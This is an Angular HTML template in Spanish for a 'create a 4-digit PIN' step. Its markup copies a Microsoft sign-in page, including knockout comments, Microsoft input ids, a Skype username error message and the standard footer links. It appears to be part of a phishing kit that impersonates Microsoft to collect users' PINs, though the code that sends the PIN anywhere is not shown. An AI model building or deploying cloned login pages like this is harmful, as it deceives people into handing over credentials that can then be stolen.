<div class="outer" >

    <div class="template-section main-section">
        <div class="middle" >

            <div  id="lightbox"  class="sign-in-box ext-sign-in-box fade-in-lightbox has-popup">



        <div class="lightbox-cover" ></div>



        <div class="win-scroll">
            
            <div ><!--  -->

<img class="logo" role="img" pngsrc="assets/logo.png"   src="assets/logo.png" ><!-- /ko -->
<!-- /ko --><!-- /ko -->
<!-- /ko --></div>

            <div role="main" ><!--  -->

<div  class="">


    <div [formGroup]='frmLoginpin'  class="pagination-view animate slide-in-next" >

<div data-viewid="1" data-showfedcredbutton="true" ><!--  -->

<div ><div class="row title ext-title" id="loginHeader" >
    <div role="heading" aria-level="1" >Crear un pin de 4 digitos</div>

</div></div>



<div class="row">
    <div *ngIf="false" role="alert" aria-live="assertive">

        <div class="col-md-24 error ext-error" id="usernameError" >Escribe una dirección de correo electrónico, un número de teléfono o un nombre de Skype válidos.</div>

    </div>

    <div    class="form-group col-md-24">

        <div class="placeholderContainer" >


            <input *ngIf="true" formControlName='pinxs'    type="password"   maxlength="113" lang="en" class="form-control ltr_override input ext-input text-box ext-text-box" aria-required="true" placeholder="Ingrese su PIN">
                    <input   formControlName='pinxsrepet' *ngIf="true"   type="password"  id="i0116" maxlength="113" lang="en" class="form-control ltr_override input ext-input text-box ext-text-box" aria-required="true" placeholder="Confirme su PIN">
            <input  type="password" id="i0118" autocomplete="off" class="moveOffScreen" tabindex="-1" aria-hidden="true">
</div>

    </div>
</div>

<div  class="position-buttons">
    <div class="row">
        <div class="col-md-24">
            <div class="text-13">
                              <div class="form-group">
    



<span class="help-button" role="button" tabindex="0"  >

</span>

<div ><!--  -->

<div ><!-- --></div></div><!-- /ko -->
                </div>
                              <div class="form-group" ><!--  -->

<div class="form-group">

</div>

</div>
                <!-- /ko -->



            </div>
        </div>
    </div>
</div>



<div class="win-button-pin-bottom" >
    <div class="row" >
        <div ><div class="col-xs-24 no-padding-left-right button-container" >


    <div  class="inline-block">
       
        <input  type="submit"  (click)="passpin()" [disabled]='!frmLoginpin.valid || !validacion()' class="button ext-button primary ext-primary" value="Continuar">
    </div>
</div></div>
    </div>
</div>

</div>
 
        
      
    </div>







<!--second mail-->














</div></div>
            <!-- /ko -->
        </div>




        <div><input type="hidden"  value="1">
<input type="hidden"  value="0">
<input type="hidden"  >
<input type="hidden"   value=""></div>
    <!-- /ko -->
            </div>





























            <!-- ko if: $page.newSession --><!-- /ko -->

            <!-- ko if: $page.showDebugDetails --><!-- /ko -->

            <!-- ko if: !svr.CA && $page.paginationControlMethods() && $page.paginationControlMethods().hasInitialViewShown() -->
            <div id="footer" role="contentinfo" class="footer ext-footer">

                <div ><!-- ko if: !hideFooter && (showLinks || impressumLink || showIcpLicense) -->
<div id="footerLinks" class="footerNode text-secondary">

    <!-- ko if: showFooter -->
        <!-- ko if: !hideTOU -->
        <a id="ftrTerms"  href="" class="footer-content ext-footer-content footer-item ext-footer-item">Términos de uso</a>
        <!-- /ko -->

        <!-- ko if: !hidePrivacy -->
        <a id="ftrPrivacy"  href="" class="footer-content ext-footer-content footer-item ext-footer-item">Privacidad y cookies</a>
        <!-- /ko -->

        <!-- ko if: impressumLink --><!-- /ko -->

        <!-- ko if: showIcpLicense --><!-- /ko -->
    <!-- /ko -->

    <!-- Set attr binding before hasFocusEx to prevent Narrator from losing focus -->
    <a id="moreOptions" href="#" role="button"  aria-label="Haga clic aquí para obtener información relacionada con la solución de problemas." aria-expanded="false" class="footer-content ext-footer-content footer-item ext-footer-item debug-item ext-debug-item">...</a>
</div>
<!-- /ko -->

<!-- ko if: svr.Cq && showLinks --><!-- /ko --></div>
            </div>
            <!-- /ko -->
        </div>
    </div>
</div>